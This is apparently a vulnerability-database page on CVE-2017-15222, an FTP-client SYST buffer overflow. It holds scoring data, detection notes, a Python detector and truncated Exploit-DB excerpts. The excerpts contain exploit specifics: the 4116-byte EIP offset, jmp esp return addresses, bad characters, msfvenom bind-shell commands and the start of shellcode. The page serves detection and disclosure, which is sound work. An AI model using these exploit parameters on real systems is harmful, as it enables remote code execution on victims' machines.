CVE-2017-15222
Published 2017-10-24
CVE-2017-15222: Buffer Overflow vulnerability in Ayukov NFTPD 2.0 and earlier allows remote attackers to execute arbitrary code.
Priority: P267 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 60.33% (99.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nftp_project | nftp | <= 2.0 | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- Overflow buffer layout: \x20*4116 + [ret].pack('V') + nops(10) + payload
- \xdd\xfc\x40\x00
- \x10\xb3\x45\x7e
- \x95\x3A\x92\x7c
- \x43\x75\x92\x7C
- \xc7\x41\xe6\x77
- \xf3\x67\xe6\x77
- The exploit is triggered by a malicious FTP server responding to the client's SYST request with an oversized buffer (>4116 bytes). Detect FTP SYST responses exceeding normal length (e.g., >256 bytes) from servers to clients.
- The EIP overwrite offset is exactly 4116 bytes into the SYST response buffer. A SYST response containing 4116+ bytes of padding followed by a return address is a strong exploit indicator.
- The Metasploit module uses 0x20 (space) characters as the initial padding in the overflow buffer. A SYST response beginning with thousands of space characters (0x20) is suspicious.
- Bad characters for shellcode encoding are \x00\x0A\x0D (and \x40 in some variants). Shellcode in the SYST response will avoid these bytes.
- The malicious FTP server sends a crafted 220 banner, accepts USER/PASS, then delivers the overflow payload in the SYST response followed by a 257 response. Monitor for rogue FTP servers on port 21 exhibiting this sequence.
- NOP sled patterns (\x90 repeated) appear immediately after the return address in all exploit variants. Detect NOP sleds in FTP SYST response payloads.
- The exploit spawns a bind shell (windows/shell_bind_tcp) on the victim. Monitor for unexpected listening TCP ports (4444, 5150) on FTP client machines after FTP connections.
- Return addresses are OS/SP-specific and hardcoded to non-ASLR DLLs on Windows XP. The exploit does not work against systems with ASLR enabled.
- The Metasploit module only targets Windows XP Pro SP3 English with GDI32.dll ret address 0x77f31d2f; other targets require different return addresses.
- The null byte (\x00) in the call esp address from nftpc.exe terminates the overflow string, limiting reliability of that specific gadget.
- The Metasploit module requires a StackAdjustment of -3500 for reliable payload execution.
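The detection notes above can be turned into a small control-channel heuristic. The following is an added example written for this page; it is not code from the Metasploit module or from any of the exploit authors listed below. It assumes an FTP conversation has already been reconstructed into (direction, payload) pairs (the capture format is an assumption), and it checks only the server's reply to SYST for the traits the notes describe: a reply that is not a normal 215 line, an oversized reply, a leading run of 0x20 padding reaching the 4116-byte EIP offset, and a \x90 NOP sled. The two sample sessions are constructed; the malicious one mirrors the quoted buffer layout with the USER32.dll return address bytes from this page, a ten-byte NOP sled, and a dummy payload of int3 (0xCC) bytes in place of shellcode. The bind-shell port check (4444, 5150) is host-side and not covered here.

```python
"""Heuristic detector for the NFTP SYST-response overflow pattern.

Input: an FTP control-channel conversation as a list of (direction, payload)
tuples, direction 'C' for client->server and 'S' for server->client.
Output: a list of alert strings (an empty list means nothing suspicious).
"""

# Thresholds taken from the detection notes on this page
MAX_NORMAL_SYST_LEN = 256   # a genuine "215 ..." SYST reply is one short line
EIP_OFFSET = 4116           # bytes of padding before the return address
NOP_SLED_MIN = 10           # the Metasploit module places nops(10) after the ret address


def leading_run(data, value):
    """Length of the run of byte `value` at the start of `data`."""
    count = 0
    for b in data:
        if b != value:
            break
        count += 1
    return count


def analyze_ftp_session(messages):
    """Return alerts for the server reply that answers the client's SYST command."""
    alerts = []
    last_cmd = None
    for direction, data in messages:
        if direction == 'C':
            # remember which command the next server reply answers
            last_cmd = data.split(b' ', 1)[0].strip().upper()
            continue
        if last_cmd != b'SYST':
            continue
        last_cmd = None  # examine only the first reply to SYST
        # a legitimate SYST reply is "215 <system type>"
        if not data.startswith(b'215'):
            alerts.append('SYST reply does not carry a 215 code')
        if len(data) > MAX_NORMAL_SYST_LEN:
            alerts.append('oversized SYST reply: %d bytes' % len(data))
        pad = leading_run(data, 0x20)
        if pad >= EIP_OFFSET:
            alerts.append('SYST reply opens with %d 0x20 bytes (reaches EIP offset %d)'
                          % (pad, EIP_OFFSET))
        if b'\x90' * NOP_SLED_MIN in data:
            alerts.append('NOP sled in SYST reply')
    return alerts


# Constructed sample sessions (not real captures).
BENIGN_SESSION = [
    ('S', b'220 FTP server ready\r\n'),
    ('C', b'USER anonymous\r\n'),
    ('S', b'331 Please specify the password.\r\n'),
    ('C', b'PASS guest\r\n'),
    ('S', b'230 Login successful.\r\n'),
    ('C', b'SYST\r\n'),
    ('S', b'215 UNIX Type: L8\r\n'),
]

# Mirrors the buffer layout quoted on this page: 0x20 padding up to the EIP
# offset, the 4-byte USER32.dll jmp esp address listed above, a short NOP sled,
# then dummy int3 (0xCC) bytes standing in for a payload.
MALICIOUS_SESSION = [
    ('S', b'220 Welcome\r\n'),
    ('C', b'USER anonymous\r\n'),
    ('S', b'331 OK\r\n'),
    ('C', b'PASS guest\r\n'),
    ('S', b'230 OK\r\n'),
    ('C', b'SYST\r\n'),
    ('S', b'\x20' * EIP_OFFSET + b'\x10\xb3\x45\x7e' + b'\x90' * NOP_SLED_MIN + b'\xcc' * 32),
    ('S', b'257 "/"\r\n'),
]

if __name__ == '__main__':
    for name, session in (('benign', BENIGN_SESSION), ('malicious', MALICIOUS_SESSION)):
        print(name, analyze_ftp_session(session) or 'no alerts')
```

The 256-byte and 4116-byte thresholds are deliberately kept separate: the length check alone catches variants that pad with something other than spaces, while the padding check gives a high-confidence match for the Metasploit layout specifically.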
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Exploit-DB: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow (exploitdb · 2019-11-04 · CVSS 9.8 · CVE-2017-15222 [CRITICAL])
---
# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150
#!/usr/bin/env python2
import os, sys, socket
NARGS = len(sys.argv)
# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95 FFD6 CALL ESI # Wi
Exploit-DB: Ayukov NFTP FTP Client 2.0 - Buffer Overflow (exploitdb · 2019-01-02 · CVSS 9.8 · CVE-2017-15222 [CRITICAL])
---
# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222
# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python
import socket
IP = '192.168.43.28'
port = 21
buf = ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\
Exploit-DB: Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit) (exploitdb · 2018-01-05 · CVE-2017-15222)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Ayukov NFTP FTP Client Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
is possible to cause a denial-of-service condition on the FTP client, or arbitrary remote
code execution under the context of the user if successfully exploited.
},
'Author' =>
[
'Berk Cem Goksel', # Original exploit author
'Daniel Teixeira', # MSF module author
'sinn3r' # RCA, improved module reliability and user exp
],
'
Exploit-DB: Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow (exploitdb · 2017-10-21 · CVSS 9.8 · CVE-2017-15222 [CRITICAL])
---
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://ayukov.com/nftp/source-release.html
# Software Link: ftp://ftp.ayukov.com/pub/nftp/
# Version: v1.71, v1.72, v1.8, v2.0
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2017-15222
import socket
IP = '127.0.0.1'
port = 21
#(exec calc.exe)
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\
Metasploit: Ayukov NFTP FTP Client Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP Client 2.0 and earlier. By responding with a long string of data for the SYST request, it is possible to cause a denial-of-service condition on the FTP client, or arbitrary remote code execution under the context of the user if successfully exploited.
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/101602
- https://www.exploit-db.com/exploits/43025/
- https://www.exploit-db.com/exploits/43448/
- https://www.exploit-db.com/exploits/46070/
Published 2017-10-24